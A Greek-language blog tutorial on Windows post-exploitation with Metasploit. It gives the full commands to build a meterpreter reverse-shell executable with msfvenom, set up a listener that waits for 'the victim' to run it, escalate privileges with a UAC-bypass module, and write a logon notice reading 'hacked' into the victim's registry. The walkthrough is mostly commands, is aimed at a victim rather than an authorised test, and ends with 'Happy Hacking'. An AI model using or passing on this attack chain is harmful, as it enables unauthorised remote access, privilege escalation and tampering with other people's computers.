full screen background image

Post Exploitation – Notice Caption

Καλησπέρα ! Έχω καιρό να ανεβάσω κάποιον οδηγό, βρήκα τον χρόνο σήμερα και θα ανεβάσω έναν οδηγό πάνω στο Post – Exploitation και συγκεκριμένα πάνω στο Notice Caption σε Win μηχανήματα με το Metasploit.

Ορολογίες :

1) Metasploit = Ένα δημοφιλής penetration testing tool με πολλές δυνατότητες περιέχει μια βάση δεδομένων με exploit που μπορούμε να τα χρησιμοποιήσουμε για την απόκτηση πρόσβαση σε κάποιο σύστημα.

2) Post – Exploitation = Μετά το exploitation να προσπαθήσουμε να πάρουμε παραπάνω δικαιώματα (gather/pivoting κτλπ)

3) Notice Caption = Ένα notice message που θα εμφανίσουμε στα windows κατά την λειτουργία !

4) Registry =  Με λίγα λόγια είναι μια βάση δεδομένων που περιέχει ρυθμίσει σχετικά με το λειτουργικό σύστημα !

5) Meterpreter = Είναι ένα δυναμικό payload που χρησιμοποιεί in memory dll injection stagers όταν πάρουμε πρόσβαση σε κάποιο σύστημα με κάποιο exploit ανοίξει ένα meterpreter session από εκεί μπορούμε να εκτελέσουμε εντολές να πάρουμε access στο shell κτλπ

Ας ξεκινήσουμε ! Αρχικά θα πρέπει να πάρουμε πρόσβαση στο μηχάνημα του θύματος.. θα σας δείξω έναν πολύ απλό τρόπο με το msfvenom του metasploit να δημιουργήσουμε ένα απλό Payload χωρίς encoders κτλπ !

Screenshot_1.thumb.png.4f0af576ec6f44d83652682d8411bece.png

Αρχικά πρέπει να πάρουμε την τοπική μας IP άμα η επίθεση θα είναι πάνω στο Local Δίκτυο.. άμα είναι εξωτερικά μπορούμε να βάλουμε ένα static hostname από το no-ip η το now-dns.

Με την εντολή : ip -4 addr show eth0 | grep -oP ‘(?<=inet\s)\d+(\.\d+){3}’  κάνουμε print μόνο inet μόνο την IP.

Τώρα ας εξηγήσουμε την δημιουργία του Payload : Msfvenom -p windows/meterpreter/reverse_tcp LHOST=$IP LPORT=$PORT -f exe > ~/Desktop/exploit.exe

-p = payload εμείς βάλαμε το payload το κλασικό windows/meterperter/reverse_tcp μπορείτε να δείτε όλα τα payloads παρακάτω εκτελώντας την εντολή στο τερματικό σας : msfvenom -l payloads

LHOST=$IP = δηλώνουμε την τοπική μας IP

LHOST=$PORT = δηλώνουμε την πόρτα στην οποία θα ακούει το payload μας άμα είναι στο τοπικό δίκτυο μας βάζουμε μια random 1-65535 ΠΡΟΣΟΧΉ ΜΗΝ ΠΈΣΕΙ ΣΕ ΚΑΜΊΑ ΓΝΩΣΤΉ ΠΌΡΤΑ ΠΆΝΩ PX : 21 του FTP η 22 του SSH η 53 του DNS η 80 του HTTP κτλπ κτλπ..

-f = είναι το format εδώ επειδή το θύμα μας είναι windows θα βάλουμε .exe άμα ήταν linux .elf κτλπ κτλπ

> = είναι που θα γίνει save με το (~) δηλώνουμε ότι θα ξεκινάει από το root directory που είναι το home /Desktop/ κτλπ

Πάμε παρακάτω..

Screenshot_2.thumb.png.090032e86871b033bacb83449b7805f9.png

Ξεκινάμε την postgresql ΠΆΝΤΑ πριν ξεκινήσουμε το Metasploit ξεκινάμε την postgresql για τα exploits αλλιώς θα έχουμε πρόβλημα.

Με την εντολή : service postgresql start ξεκινάμε το service

Με την εντολή : service postgresql status βλέπουμε άμα τρέχει η όχι εδώ είναι active.

Ας ξεκινήσουμε το Metasploit γράφοντας msfconsole.

Screenshot_3.thumb.png.912e8af2d19417f65f49598fa519282b.png

Με την εντολή db_status βλέπουμε άμα όντως το Metasploit συνδέθηκε με την postgresql.

Ας φτιάξουμε τον Listener μας.

Θα χρησιμοποιήσουμε το κλασικό Multi/Handler :

use exploit/multi/handler

Screenshot_4.thumb.png.ff20b8064b472b97510a2bf5826c0579.png

Βάζουμε το payload που βάλαμε στο msfvenom όπως και το LHOST / LPORT

set payload windows/meterpreter/reverse_tcp

set LHOST $IP

set LPORT $PORT

και πατάμε exploit τώρα βλέπουμε μας λέει : Started reverse TCP handler on 192.168.1.12:5555 | Περιμένει το θύμα μας να ανοίξει το αρχείο !

Αφού ανοίξει το θύμα μας το αρχείο βλέπουμε ότι πήραμε πρόσβαση άνοιξε meterpreter session :

Screenshot_5.thumb.png.f50fe84d2831caf28f4e75708152ff06.png

Μας λέει : 192.168.1.12:5555 -> 192.168.1.55:49175 ότι πήραμε πρόσβαση στο 192.168.1.55 μπορούμε να κάνουμε ένα migrate σε κάποιο process άμα θέλουμε.

Για να κάνουμε add Notice Caption θα πρέπει να έχουμε δικαιώματα διαχειριστή : NT AUTHORITY\SYSTEM Privs !

Με την εντολή getsystem βλέπουμε..

Screenshot_6.thumb.png.8e09fc4541a46767250e0651a30e1f30.png

Ότι δεν έχουμε ένας απλός τρόπος είναι να κάνουμε bypass το UAC !

Κάνουμε το session μας background (command : background) !

Θα πάρουμε το exploit use exploit/windows/local/bypassuac_injection θα βάλουμε το session (set session 1) μας θα μας ανοίξει μια 2 session με δικαιώματα NT AUTHORITY\SYSTEM Privs αλλά δεν είναι πάντα τόσο εύκολο..

Screenshot_7.thumb.png.54fdefc4653711fa459ee1e29b647cff.png

Βλέπουμε πήραμε τα δικαιώματα…

Πάμε τώρα να κάνουμε add Notice Caption…

Με την εντολή : reg enumkey -k HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System θα μπούμε μέσα στο registry key από το θύμα μας..

Screenshot_8.thumb.png.058faec62fd91a98c86bfe01fbc60439.png

Εμείς θα χρειαστούμε αυτά τα 2 !

Τώρα θα ορίσουμε το Title με την εντολή :

Screenshot_9.thumb.png.c09bed2b9911fe4dd5b5e13ef1dbcbc4.png

reg setval -k HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System -v legalnoticecaption -d “Message Title”

Τώρα θα βάλουμε το μήνυμα..

Με την εντολή : reg setval -k HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System -v legalnoticetext -d “hacked”

Ας κάνουμε restart το pc του θύματος…

Screenshot_11.thumb.png.0b44067b718b1549556de82186ec5fb7.png

Και έγινε… ;) Happy Hacking Bye ;)




Leave a Reply

Your email address will not be published. Required fields are marked *